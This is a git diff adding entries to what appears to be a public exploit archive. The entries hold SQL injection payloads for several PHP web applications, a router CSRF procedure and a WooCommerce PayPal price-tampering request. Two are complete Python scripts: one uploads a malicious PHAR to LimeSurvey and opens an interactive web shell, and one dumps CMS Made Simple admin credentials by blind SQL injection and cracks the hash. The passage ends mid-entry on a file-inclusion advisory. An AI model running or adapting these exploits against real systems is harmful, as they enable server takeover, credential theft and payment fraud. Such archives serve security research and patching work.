diff --git a/exploits/hardware/webapps/46633.html b/exploits/hardware/webapps/46633.html
new file mode 100644
index 000000000..ae0057727
--- /dev/null
+++ b/exploits/hardware/webapps/46633.html
@@ -0,0 +1,61 @@
+# Exploit Title: JioFi 4G M2S 1.0.2 devices have CSRF via the SSID name and Security Key field under Edit Wi-Fi Settings (aka a SetWiFi_Setting request to cgi-bin/qcmap_web_cgi)
+# Exploit Author: Vikas Chaudhary
+# Date: 21-01-2019
+# Vendor Homepage: https://www.jio.com/
+# Hardware Link: https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29
+# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router
+# Category: Hardware
+# Contact: https://www.facebook.com/profile.php?id=100011287630308
+# Web: https://gkaim.com/
+# Tested on: Windows 10 X64- Firefox-65.0
+# CVE-2019-7440
+***********************************************************************
+## Vulnerability Description :- The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests.
+This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
+ The issue is triggered when an unauthorized input passed via multiple POST and GET parameters are not properly sanitized
+before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context
+of an affected site.
+----------------------------------------
+# Proof Of Concept:-PoC
+1- First Open BurpSuite
+2- Make Intercept on
+3 -Go to your Wifi Router's Gateway in Browser [i.e http://192.168.225.1 ]
+4-Goto wifi edit section and click on apply
+5-Now capture the data and generate CSRF PoC
+6-Now Change the SSID name and Password (Security Key) According to you
+7-Save it as .html and send it to Victim.
+8-Victim's profile will be changed according to you
+-------------------
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/46630.txt b/exploits/php/webapps/46630.txt
new file mode 100644
index 000000000..b243bb555
--- /dev/null
+++ b/exploits/php/webapps/46630.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Inout EasyRooms Ultimate Edition - SQL Injection
+# Date: 29.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.inoutscripts.com/products/inout-easyrooms/
+# Demo Site: http://inout-easyrooms.demo.inoutscripts.net/
+# Version: v1.0
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request: http://localhost/[PATH]/search/rentals
+Vulnerable Parameter: guests (POST)
+Payload: guests=-1' OR 3*2*1=6 AND 00046=00046 --
+
+----- PoC 2: SQLi -----
+
+Request: http://localhost/[PATH]/search/searchdetailed
+Vulnerable Parameter: location (POST)
+Payload: location=-1' OR 3*2*1=6 AND 000603=000603 or 'UeNQc30f'='
+
+----- PoC 3: SQLi -----
+
+Request: http://localhost/[PATH]/search/searchdetailed
+Vulnerable Parameter: numguest (POST)
+Payload: numguest=-1' OR 3*2*1=6 AND 000232=000232 --
+
+
+----- PoC 4: SQLi -----
+
+Request: http://localhost/[PATH]/search/searchdetailed
+Vulnerable Parameter: property1 (POST)
+Payload:
+property1=(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
\ No newline at end of file
diff --git a/exploits/php/webapps/46631.txt b/exploits/php/webapps/46631.txt
new file mode 100644
index 000000000..3f3aa4ae8
--- /dev/null
+++ b/exploits/php/webapps/46631.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Inout RealEstate - SQL Injection
+# Date: 29.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.inoutscripts.com/products/inout-realestate/
+# Demo Site: http://inout-realestate.demo.inoutscripts.net/
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+Request: http://localhost/[PATH]/agents/agentlistdetails
+Vulnerable Parameter: city (POST)
+Payload: brokername=&city=1' RLIKE (SELECT (CASE WHEN (8778=8778) THEN 1
+ELSE 0x28 END)) AND 'VZpy'='VZpy&cityname=e&page=1&sortby=1
\ No newline at end of file
diff --git a/exploits/php/webapps/46632.txt b/exploits/php/webapps/46632.txt
new file mode 100644
index 000000000..77c3729a7
--- /dev/null
+++ b/exploits/php/webapps/46632.txt
@@ -0,0 +1,75 @@
+# Exploit Title: cgi-bin/webscr?cmd=_cart in the WooCommerce PayPal Checkout Payment Gateway plugin 1.6.8 for WordPress allows Parameter Tampering in an amount parameter (such as amount_1), as demonstrated by purchasing an item for lower than the intended price
+# Date: 27.01.2019
+# Product Title :Woocommerce Paypal gateway Plugin
+# Vendor Homepage: https://wordpress.org
+# Software Link : https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
+# Category: Web Applications Plugin (Wordpress)
+# Version: 1.6.8
+# Active installations: 700,000+
+# Exploit Author: Vikas Chaudhary
+# Contact: https://gkaim.com/contact-us/
+# Web: https://gkaim.com/
+# Tested on: Windows 10 -Firefox .
+# CVE-2019-7441
+*****************************************************
+## VENDOR SUMMARY :- This is a PayPal Checkout Payment Gateway for WooCommerce.
+PayPal Checkout allows you to securely sell your products and subscriptions online using In-Context Checkout to help you meet security requirements without causing your theme to suffer. In-Context Checkout uses a modal window, hosted on PayPalís servers, that overlays the checkout form and provides a secure means for your customers to enter their account information
+
+## Vulnerability Description => The Web Parameter Tampering attack is based on the manipulation of parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. Usually, this information is stored in cookies, hidden form fields, or URL Query Strings, and is used to increase application functionality and control.
+This attack can be performed by a malicious user who wants to exploit the application for their own benefit, or an attacker who wishes to attack a third-person using a Man-in-the-middle attack. In both cases, tools likes Webscarab and Paros proxy are mostly used.
+__________________________________
+Proof Of Concept:- PoC
+1 -Install Woocommerce Paypal checkout gateway plugin (1.6.8) in Remote.
+2- Now fix a price of any product and configure it with this plguin.
+3- Do checkout through paypal and capture the data from burp.
+5- Here you will find post based request with amount parameter- Now Edit amount parameter as you want and forward it .
+6- You will see a new price and you can purchase that product on your new edited price.
+-------------------
+Post REQUEST:-
+GET /cgi-bin/webscr?cmd=_cart&business=gkaim100%40gmail.com&no_note=1¤cy_code=INR&charset=utf-8&rm=2&upload=1&return=https%3A%2F%2Fa2zcourse.com%2Fcheckout%2Forder-received%2F798%2F%3Fkey%3Dwc_order_wJp0p80pFSg8V%26utm_nooverride%3D1&cancel_return=https%3A%2F%2Fa2zcourse.com%2Fbasket%2F%3Fcancel_order%3Dtrue%26order%3Dwc_order_wJp0p80pFSg8V%26order_id%3D798%26redirect%26_wpnonce%3D68f71663cb&page_style=A2Zcourse.com&image_url=&paymentaction=sale&bn=WooThemes_Cart&invoice=A2Z-798&custom=%7B%22order_id%22%3A798%2C%22order_key%22%3A%22wc_order_wJp0p80pFSg8V%22%7D¬ify_url=https%3A%2F%2Fa2zcourse.com%2Fwc-api%2FWC_Gateway_Paypal%2F&first_name=dfkjk&last_name=v%3Blbkm&address1=&address2=&city=&state=&zip=&country=&email=sdflmnvkj%40xncv.com&night_phone_b=8908098090&no_shipping=1&tax_cart=0.00&item_name_1=Artificial+Intelligence+2018+Build+the+Most+Powerful+AI&quantity_1=1&amount_1=5000&item_number_1=Artificial+Intelligence+2018 HTTP/1.1
+Host: www.paypal.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://a2zcourse.com/checkout/
+Connection: close
+Upgrade-Insecure-Requests: 1
+----------------
+Post RESPONSE:--
+HTTP/1.1 302 Moved Temporarily
+Server: Apache
+X-Recruiting: If you are reading this, maybe you should be working at PayPal instead! Check out https://www.paypal.com/us/webapps/mpp/paypal-jobs
+Paypal-Debug-Id: 2f8e90a8c5e72
+Cache-Control: no-cache
+x-content-type-options: nosniff
+x-xss-protection: 1; mode=block
+x-frame-options: SAMEORIGIN
+content-security-policy: default-src 'self' https://*.paypal.com; script-src 'nonce-iJYgKZYXXhHUAluelfhZan+dO96W5x49hsgMXR3ZPHDRR/SI' 'self' https://*.paypal.com 'unsafe-inline' 'unsafe-eval'; img-src https://*.paypalobjects.com; object-src 'none'; font-src 'self' https://*.paypalobjects.com; form-action 'self' https://*.paypal.com; base-uri 'self' https://*.paypal.com; block-all-mixed-content; report-uri https://www.paypal.com/csplog/api/log/csp
+HTTP_X_PP_AZ_LOCATOR: dcg13.slc
+Paypal-Debug-Id: 2f8e90a8c5e72
+Location: https://www.paypal.com/webapps/hermes?token=13V78288LV2795452&useraction=commit&rm=2&mfid=1548578790132_2f8e90a8c5e72
+Cache-Control: max-age=0, no-cache, no-store, must-revalidate
+Pragma: no-cache
+Content-Type: text/html; charset=utf-8
+DC: ccg11-origin-www-1.paypal.com
+Content-Length: 302
+X-EdgeConnect-MidMile-RTT: 219
+X-EdgeConnect-Origin-MEX-Latency: 801
+Date: Sun, 27 Jan 2019 08:46:30 GMT
+Connection: close
+Vary: Accept-Encoding
+Set-Cookie: tsrce=xorouternodeweb; Domain=.paypal.com; Path=/; Expires=Wed, 30 Jan 2019 08:46:30 GMT; HttpOnly; Secure
+Set-Cookie: ts=vr%3D8e7d19d1168ac1200012cd39fff5bb0f%26vreXpYrS%3D1643249566%26vteXpYrS%3D1548580589%26vt%3D8e7d19d4168ac1200012cd39fff5bb0e; Domain=.paypal.com; Path=/; Expires=Thu, 27 Jan 2022 02:12:47 GMT; HttpOnly; Secure
+Set-Cookie: nsid=s%3AU8TmrvBUulZLtqFmT9F1ZeoVNf4dKoAr.slyvmBwJFEJx4Uxt4mNU%2BJH%2BrDf5uxLrKECnBRm%2FQ0I; Path=/; HttpOnly; Secure
+Set-Cookie: X-PP-SILOVER=name%3DLIVE5.WEB.1%26silo_version%3D880%26app%3Dxorouternodewebxclick%26TIME%3D3849276764%26HTTP_X_PP_AZ_LOCATOR%3Ddcg13.slc; Expires=Sun, 27 Jan 2019 09:16:30 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
+Set-Cookie: X-PP-SILOVER=; Expires=Thu, 01 Jan 1970 00:00:01 GMT
+Set-Cookie: AKDC=ccg11-origin-www-1.paypal.com; expires=Sun, 27-Jan-2019 09:16:30 GMT; path=/; secure
+Set-Cookie: akavpau_ppsd=1548579390~id=8b5783ec5a9b02390092591f951f54f8; Domain=www.paypal.com; Path=/; Secure; HttpOnly
+Strict-Transport-Security: max-age=63072000
+
+Found. Redirecting to https://www.paypal.com/webapps/hermes?token=13V78288LV2795452&useraction=commit&rm=2&mfid=1548578790132_2f8e90a8c5e72
+
+---------------------------------------------------------
+
+___________________________________
\ No newline at end of file
diff --git a/exploits/php/webapps/46634.py b/exploits/php/webapps/46634.py
new file mode 100755
index 000000000..e6f6a8d3a
--- /dev/null
+++ b/exploits/php/webapps/46634.py
@@ -0,0 +1,251 @@
+#!/usr/bin/python
+
+# Description: LimeSurvey < 3.16 use a old version of "TCPDF" library, this version is vulnerable to a Serialization Attack via the "phar://" wrapper.
+# Date: 29/03/2019
+# Exploit Title: Remote Code Execution in LimeSurvey < 3.16 via Serialization Attack in TCPDF.
+# Exploit Author: @q3rv0
+# Google Dork:
+# Version: < 3.16
+# Tested on: LimeSurvey 3.15
+# PoC: https://www.secsignal.org/news/remote-code-execution-in-limesurvey-3-16-via-serialization-attack-in-tcpdf
+# CVE: CVE-2018-17057
+# SecSignal is: <3
+# Usage: python exploit.py [URL] [USERNAME] [PASSWORD]
+
+import requests
+import sys
+import re
+
+SESSION = requests.Session()
+
+# Malicious PHAR generated with PHPGGC.
+# ./phpggc Yii/RCE1 system "echo 3c3f7068702073797374656d28245f4745545b2263225d293b203f3e0a | xxd -r -p > shell.php" -p phar -o /tmp/exploit.jpg
+
+PHAR = ("\x3c\x3f\x70\x68\x70\x20\x5f\x5f\x48\x41\x4c\x54\x5f\x43\x4f\x4d\x50\x49\x4c\x45\x52\x28\x29\x3b\x20\x3f\x3e\x0d\x0a\x38"
+ "\x02\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x02\x00\x00\x4f\x3a\x31\x31\x3a\x22\x43\x44\x62"
+ "\x43\x72\x69\x74\x65\x72\x69\x61\x22\x3a\x31\x3a\x7b\x73\x3a\x36\x3a\x22\x70\x61\x72\x61\x6d\x73\x22\x3b\x4f\x3a\x31\x32"
+ "\x3a\x22\x43\x4d\x61\x70\x49\x74\x65\x72\x61\x74\x6f\x72\x22\x3a\x33\x3a\x7b\x73\x3a\x31\x36\x3a\x22\x00\x43\x4d\x61\x70"
+ "\x49\x74\x65\x72\x61\x74\x6f\x72\x00\x5f\x64\x22\x3b\x4f\x3a\x31\x30\x3a\x22\x43\x46\x69\x6c\x65\x43\x61\x63\x68\x65\x22"
+ "\x3a\x37\x3a\x7b\x73\x3a\x39\x3a\x22\x6b\x65\x79\x50\x72\x65\x66\x69\x78\x22\x3b\x73\x3a\x30\x3a\x22\x22\x3b\x73\x3a\x37"
+ "\x3a\x22\x68\x61\x73\x68\x4b\x65\x79\x22\x3b\x62\x3a\x30\x3b\x73\x3a\x31\x30\x3a\x22\x73\x65\x72\x69\x61\x6c\x69\x7a\x65"
+ "\x72\x22\x3b\x61\x3a\x31\x3a\x7b\x69\x3a\x31\x3b\x73\x3a\x36\x3a\x22\x73\x79\x73\x74\x65\x6d\x22\x3b\x7d\x73\x3a\x39\x3a"
+ "\x22\x63\x61\x63\x68\x65\x50\x61\x74\x68\x22\x3b\x73\x3a\x31\x30\x3a\x22\x64\x61\x74\x61\x3a\x74\x65\x78\x74\x2f\x22\x3b"
+ "\x73\x3a\x31\x34\x3a\x22\x64\x69\x72\x65\x63\x74\x6f\x72\x79\x4c\x65\x76\x65\x6c\x22\x3b\x69\x3a\x30\x3b\x73\x3a\x31\x31"
+ "\x3a\x22\x65\x6d\x62\x65\x64\x45\x78\x70\x69\x72\x79\x22\x3b\x62\x3a\x31\x3b\x73\x3a\x31\x35\x3a\x22\x63\x61\x63\x68\x65"
+ "\x46\x69\x6c\x65\x53\x75\x66\x66\x69\x78\x22\x3b\x73\x3a\x31\x34\x30\x3a\x22\x3b\x62\x61\x73\x65\x36\x34\x2c\x4f\x54\x6b"
+ "\x35\x4f\x54\x6b\x35\x4f\x54\x6b\x35\x4f\x57\x56\x6a\x61\x47\x38\x67\x4d\x32\x4d\x7a\x5a\x6a\x63\x77\x4e\x6a\x67\x33\x4d"
+ "\x44\x49\x77\x4e\x7a\x4d\x33\x4f\x54\x63\x7a\x4e\x7a\x51\x32\x4e\x54\x5a\x6b\x4d\x6a\x67\x79\x4e\x44\x56\x6d\x4e\x44\x63"
+ "\x30\x4e\x54\x55\x30\x4e\x57\x49\x79\x4d\x6a\x59\x7a\x4d\x6a\x49\x31\x5a\x44\x49\x35\x4d\x32\x49\x79\x4d\x44\x4e\x6d\x4d"
+ "\x32\x55\x77\x59\x53\x42\x38\x49\x48\x68\x34\x5a\x43\x41\x74\x63\x69\x41\x74\x63\x43\x41\x2b\x49\x48\x4e\x6f\x5a\x57\x78"
+ "\x73\x4c\x6e\x42\x6f\x63\x41\x3d\x3d\x22\x3b\x7d\x73\x3a\x31\x39\x3a\x22\x00\x43\x4d\x61\x70\x49\x74\x65\x72\x61\x74\x6f"
+ "\x72\x00\x5f\x6b\x65\x79\x73\x22\x3b\x61\x3a\x31\x3a\x7b\x69\x3a\x30\x3b\x69\x3a\x30\x3b\x7d\x73\x3a\x31\x38\x3a\x22\x00"
+ "\x43\x4d\x61\x70\x49\x74\x65\x72\x61\x74\x6f\x72\x00\x5f\x6b\x65\x79\x22\x3b\x69\x3a\x30\x3b\x7d\x7d\x08\x00\x00\x00\x74"
+ "\x65\x73\x74\x2e\x74\x78\x74\x04\x00\x00\x00\x36\xad\x9d\x5c\x04\x00\x00\x00\x0c\x7e\x7f\xd8\xb6\x01\x00\x00\x00\x00\x00"
+ "\x00\x74\x65\x73\x74\xcc\xd9\x99\xbd\x5e\x65\x4e\x03\x9b\x90\xdd\xd5\x8b\xff\x28\xd2\x37\x8b\x23\xe5\x02\x00\x00\x00\x47"
+ "\x42\x4d\x42")
+
+def usage():
+ if len(sys.argv) != 4:
+ print "Usage: python exploit.py [URL] [USERNAME] [PASSWORD]"
+ sys.exit(0)
+
+def get(url):
+ r = SESSION.get(url, verify=False)
+ return r.text
+
+def post(url, data={}, files=None, headers=None):
+ r = SESSION.post(url, data=data, headers=headers, files=files, verify=False)
+ return r.text
+
+def getYIICSRFToken(url):
+ res = get(url)
+ token = re.findall(r'value="(.*)" name="YII_CSRF_TOKEN"', res)
+ return token[0]
+
+def getKCSRFToken(url):
+ res = get(url)
+ token = re.findall(r'csrftoken = "(.*)";', res)
+ return token[0]
+
+def login(url, username, password):
+ token = getYIICSRFToken(url)
+ data = {"YII_CSRF_TOKEN" : token,
+ "authMethod" : "Authdb",
+ "user" : username,
+ "password" : password,
+ "loginlang" : "default",
+ "action" : "login",
+ "width" : "1366",
+ "login_submit" : "login"
+ }
+ res = post(url, data)
+ if len(re.findall("loginform", res)) == 0:
+ return True
+ else:
+ return False
+
+def emailTemplates(url):
+ return get(url)
+
+def createSurvey(url_newsurvey, url_insert):
+ token = getYIICSRFToken(url_newsurvey)
+ data = {"YII_CSRF_TOKEN" : token,
+ "surveyls_title" : "Survey Example - SecSignal",
+ "language" : "en",
+ "createsample" : "0",
+ "description" : "foo",
+ "url" : "",
+ "urldescrip" : "",
+ "dateformat" : "1",
+ "numberformat_en": "0",
+ "welcome" : "bar",
+ "endtext" : "asdf",
+ "owner_id" : "1",
+ "admin" : "Administrator",
+ "adminemail" : "test%40gsecsignal.org",
+ "bounce_email" : "test%40gsecsignal.org",
+ "faxto" : "",
+ "gsid" : "1",
+ "format" : "G",
+ "template" : "fruity",
+ "navigationdelay": "0",
+ "questionindex" : "0",
+ "showgroupinfo" : "B",
+ "showqnumcode" : "X",
+ "shownoanswer" : "Y",
+ "showxquestions" : "0",
+ "showxquestions" : "1",
+ "showwelcome" : "0",
+ "showwelcome" : "1",
+ "allowprev" : "0",
+ "nokeyboard" : "0",
+ "showprogress" : "0",
+ "showprogress" : "1",
+ "printanswers" : "0",
+ "publicstatistics" : "0",
+ "publicgraphs" : "0",
+ "autoredirect" : "0",
+ "startdate" : "",
+ "expires" : "",
+ "listpublic" : "0",
+ "usecookie" : "0",
+ "usecaptcha_surveyaccess" : "0",
+ "usecaptcha_registration" : "0",
+ "usecaptcha_saveandload" : "0",
+ "datestamp" : "0",
+ "ipaddr" : "0",
+ "refurl" : "0",
+ "savetimings" : "0",
+ "assessments" : "0",
+ "allowsave" : "0",
+ "allowsave" : "1",
+ "emailnotificationto" : "",
+ "emailresponseto" : "",
+ "googleanalyticsapikeysetting" : "N",
+ "googleanalyticsstyle" : "0",
+ "tokenlength" : "15",
+ "anonymized" : "0",
+ "tokenanswerspersistence" : "0",
+ "alloweditaftercompletion" : "0",
+ "allowregister" : "0",
+ "htmlemail" : "0",
+ "htmlemail" : "1",
+ "sendconfirmation" : "0",
+ "sendconfirmation" : "1",
+ "saveandclose" : "1"
+ }
+ res = post(url_insert, data)
+ surveyid = re.findall(r'surveyid\\/([0-9]+)', res)
+ return surveyid[0] # Return SurveyiD
+
+def uploadPHAR(url_upload, url_csrf_token, phar):
+ kcfinder_csrftoken = getKCSRFToken(url_csrf_token)
+ files = {'upload[]': ('malicious.jpg', phar)}
+ data = {"dir" : "files",
+ "kcfinder_csrftoken" : kcfinder_csrftoken
+ }
+ res = post(url_upload, data, files)
+ return res
+
+def pdfExport(url_pdf_export, surveyid):
+ token = getYIICSRFToken(url_pdf_export + surveyid)
+ data = {"save_language" : "en",
+ "queXMLStyle" : 'Stage 2
',
+ "queXMLSingleResponseAreaHeight" : "9",
+ "queXMLSingleResponseHorizontalHeight" : "10.5",
+ "queXMLQuestionnaireInfoMargin" : "5",
+ "queXMLResponseTextFontSize" : "10",
+ "queXMLResponseLabelFontSize" : "7.5",
+ "queXMLResponseLabelFontSizeSmall" : "6.5",
+ "queXMLSectionHeight" : "18",
+ "queXMLBackgroundColourSection" : "221",
+ "queXMLBackgroundColourQuestion" : "241",
+ "queXMLAllowSplittingSingleChoiceHorizontal" : "0",
+ "queXMLAllowSplittingSingleChoiceHorizontal" : "1",
+ "queXMLAllowSplittingSingleChoiceVertical" : "0",
+ "queXMLAllowSplittingSingleChoiceVertical" : "1",
+ "queXMLAllowSplittingMatrixText" : "0",
+ "queXMLAllowSplittingMatrixText" : "1",
+ "queXMLAllowSplittingVas" : "0",
+ "queXMLPageOrientation" : "P",
+ "queXMLPageFormat" : "A4",
+ "queXMLEdgeDetectionFormat" : "lines",
+ "YII_CSRF_TOKEN" : token,
+ "ok" : "Y"}
+ res = post(url_pdf_export + surveyid, data)
+ return res
+
+def shell(url):
+ r = requests.get("%s/shell.php" % url)
+ if r.status_code == 200:
+ print "[+] Pwned! :)"
+ print "[+] Getting the shell..."
+ while 1:
+ try:
+ input = raw_input("$ ")
+ r = requests.get("%s/shell.php?c=%s" % (url, input))
+ print r.text
+ except KeyboardInterrupt:
+ sys.exit("\nBye kaker!")
+ else:
+ print "[*] The site seems not to be vulnerable :("
+
+def main():
+ usage()
+ url = sys.argv[1] # URL
+ username = sys.argv[2] # Username
+ password = sys.argv[3] # Password
+ url_login = "%s/index.php/admin/authentication/sa/login" % url
+
+ print "[*] Logging in to LimeSurvey..."
+ if login(url_login, username, password):
+
+ url_newsurvey = "%s/index.php/admin/survey/sa/newsurvey" % url
+ url_insert = "%s/index.php/admin/survey/sa/insert" % url
+
+ print "[*] Creating a new Survey..."
+ surveyid = createSurvey(url_newsurvey, url_insert)
+ print "[+] SurveyID: %s" % surveyid
+
+ email_templates = "%s/index.php/admin/emailtemplates/sa/index/surveyid/%s" % (url, surveyid)
+
+ emailTemplates(email_templates)
+
+ url_csrf_token = "%s/third_party/kcfinder/browse.php?opener=custom&type=files&CKEditor=email_invitation_en&langCode=en" % url
+ url_upload = "%s/third_party/kcfinder/browse.php?type=files&lng=en&opener=custom&act=upload" % url
+
+ print "[*] Uploading a malicious PHAR..."
+ uploadPHAR(url_upload, url_csrf_token, PHAR)
+
+ url_pdf_export = "%s/index.php/admin/export/sa/quexml/surveyid/" % url
+
+ print "[*] Sending the Payload..."
+ export_response = pdfExport(url_pdf_export, surveyid)
+ print "[*] TCPDF Response: %s" % export_response
+
+ shell(url)
+ else:
+ print "[-] Bad credentials :("
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/46635.py b/exploits/php/webapps/46635.py
new file mode 100755
index 000000000..49cfbdd13
--- /dev/null
+++ b/exploits/php/webapps/46635.py
@@ -0,0 +1,186 @@
+#!/usr/bin/env python
+# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
+# Date: 30-03-2019
+# Exploit Author: Daniele Scanu @ Certimeter Group
+# Vendor Homepage: https://www.cmsmadesimple.org/
+# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
+# Version: <= 2.2.9
+# Tested on: Ubuntu 18.04 LTS
+# CVE : CVE-2019-9053
+
+import requests
+from termcolor import colored
+import time
+from termcolor import cprint
+import optparse
+import hashlib
+
+parser = optparse.OptionParser()
+parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
+parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
+parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
+
+options, args = parser.parse_args()
+if not options.url:
+ print "[+] Specify an url target"
+ print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
+ print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
+ print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
+ exit()
+
+url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
+session = requests.Session()
+dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
+flag = True
+password = ""
+temp_password = ""
+TIME = 1
+db_name = ""
+output = ""
+email = ""
+
+salt = ''
+wordlist = ""
+if options.wordlist:
+ wordlist += options.wordlist
+
+def crack_password():
+ global password
+ global output
+ global wordlist
+ global salt
+ dict = open(wordlist)
+ for line in dict.readlines():
+ line = line.replace("\n", "")
+ beautify_print_try(line)
+ if hashlib.md5(str(salt) + line).hexdigest() == password:
+ output += "\n[+] Password cracked: " + line
+ break
+ dict.close()
+
+def beautify_print_try(value):
+ global output
+ print "\033c"
+ cprint(output,'green', attrs=['bold'])
+ cprint('[*] Try: ' + value, 'red', attrs=['bold'])
+
+def beautify_print():
+ global output
+ print "\033c"
+ cprint(output,'green', attrs=['bold'])
+
+def dump_salt():
+ global flag
+ global salt
+ global output
+ ord_salt = ""
+ ord_salt_temp = ""
+ while flag:
+ flag = False
+ for i in range(0, len(dictionary)):
+ temp_salt = salt + dictionary[i]
+ ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
+ beautify_print_try(temp_salt)
+ payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
+ url = url_vuln + "&m1_idlist=" + payload
+ start_time = time.time()
+ r = session.get(url)
+ elapsed_time = time.time() - start_time
+ if elapsed_time >= TIME:
+ flag = True
+ break
+ if flag:
+ salt = temp_salt
+ ord_salt = ord_salt_temp
+ flag = True
+ output += '\n[+] Salt for password found: ' + salt
+
+def dump_password():
+ global flag
+ global password
+ global output
+ ord_password = ""
+ ord_password_temp = ""
+ while flag:
+ flag = False
+ for i in range(0, len(dictionary)):
+ temp_password = password + dictionary[i]
+ ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
+ beautify_print_try(temp_password)
+ payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
+ payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
+ url = url_vuln + "&m1_idlist=" + payload
+ start_time = time.time()
+ r = session.get(url)
+ elapsed_time = time.time() - start_time
+ if elapsed_time >= TIME:
+ flag = True
+ break
+ if flag:
+ password = temp_password
+ ord_password = ord_password_temp
+ flag = True
+ output += '\n[+] Password found: ' + password
+
+def dump_username():
+ global flag
+ global db_name
+ global output
+ ord_db_name = ""
+ ord_db_name_temp = ""
+ while flag:
+ flag = False
+ for i in range(0, len(dictionary)):
+ temp_db_name = db_name + dictionary[i]
+ ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
+ beautify_print_try(temp_db_name)
+ payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
+ url = url_vuln + "&m1_idlist=" + payload
+ start_time = time.time()
+ r = session.get(url)
+ elapsed_time = time.time() - start_time
+ if elapsed_time >= TIME:
+ flag = True
+ break
+ if flag:
+ db_name = temp_db_name
+ ord_db_name = ord_db_name_temp
+ output += '\n[+] Username found: ' + db_name
+ flag = True
+
+def dump_email():
+ global flag
+ global email
+ global output
+ ord_email = ""
+ ord_email_temp = ""
+ while flag:
+ flag = False
+ for i in range(0, len(dictionary)):
+ temp_email = email + dictionary[i]
+ ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
+ beautify_print_try(temp_email)
+ payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
+ url = url_vuln + "&m1_idlist=" + payload
+ start_time = time.time()
+ r = session.get(url)
+ elapsed_time = time.time() - start_time
+ if elapsed_time >= TIME:
+ flag = True
+ break
+ if flag:
+ email = temp_email
+ ord_email = ord_email_temp
+ output += '\n[+] Email found: ' + email
+ flag = True
+
+dump_salt()
+dump_username()
+dump_email()
+dump_password()
+
+if options.cracking:
+ print colored("[*] Now try to crack password")
+ crack_password()
+
+beautify_print()
\ No newline at end of file
diff --git a/exploits/php/webapps/46637.txt b/exploits/php/webapps/46637.txt
new file mode 100644
index 000000000..16ea9cb2a
--- /dev/null
+++ b/exploits/php/webapps/46637.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Fiverr Clone Script 1.2.2 - SQL Injection / Cross Site Scripting
+# Exploit Author: Mr Winst0n
+# Author E-mail: manamtabeshekan@gmail.com
+# Discovery Date: Apr 1, 2019
+# Vendor Homepage: https://www.phpscriptsmall.com
+# Software Link : https://www.phpscriptsmall.com/product/fiverr-clone-script/
+# Tested Version: 1.2.2
+# Tested on: Kali linux, Windows 8.1
+
+
+# PoC:
+
+# http://localhost/?page=[SQLi]
+# http://localhost/search-results.php?category=[Category id]&subcategory=[Subcategory id]&keyword=[XSS]
+
+# http://localhost/?page=2%20%27%20OR%201%20=%201%20--
+# http://localhost/search-results.php?category=32&subcategory=63&keyword=&project_search=#
\ No newline at end of file
diff --git a/exploits/php/webapps/46638.py b/exploits/php/webapps/46638.py
new file mode 100755
index 000000000..142462ebe
--- /dev/null
+++ b/exploits/php/webapps/46638.py
@@ -0,0 +1,33 @@
+# Exploit Title: phpFileManager 1.7.8 - Local File Inclusion
+# Date: 01.04.2019
+# Exploit Author: Murat Kalafatoglu
+# Vendor Homepage: https://sourceforge.net/projects/phpfm/
+# Software Demo: https://phpfm-demo.000webhostapp.com/
+# Version: v1.7.8
+# Category: Webapps
+# Tested on: XAMPP for Linux
+# Description: Any user can read files from the server
+# without authentication due to an existing LFI in the following path:
